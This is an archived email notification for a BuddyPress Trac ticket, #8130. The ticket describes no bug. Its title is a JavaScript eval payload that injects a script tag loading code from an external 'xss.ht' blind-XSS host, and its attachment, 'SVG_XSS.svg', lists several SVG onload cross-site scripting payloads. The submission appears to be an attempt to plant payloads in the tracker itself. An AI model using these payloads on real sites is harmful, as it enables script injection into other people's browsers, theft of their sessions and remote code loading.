[buddypress-trac] [BuddyPress Trac] #8130: javascript:eval('var a=document.createElement(\'script\'); a.src=\'https://yoursubdomain.xss.ht\'; document.body.appendChild(a)')
buddypress-trac
noreply at wordpress.org
Sun Aug 18 23:56:34 UTC 2019
#8130: javascript:eval('var
a=document.createElement(\'script\');a.src=\'https://yoursubdomain.xss.ht\';document.body.appendChild(a)')
--------------------------+------------------------------
Reporter: zhacker13 | Owner: (none)
Type: defect (bug) | Status: new
Priority: normal | Milestone: Awaiting Review
Component: Core | Version:
Severity: normal | Resolution:
Keywords: |
--------------------------+------------------------------
Changes (by zhacker13):
* Attachment "SVG_XSS.svg" added.
<svgonload=alert(1)> <svg/onload=alert('XSS')> <svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))> <svg id=alert(1)
onload=eval(id)> "><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
--
Ticket URL: <https://buddypress.trac.wordpress.org/ticket/8130>
BuddyPress Trac <http://buddypress.org/>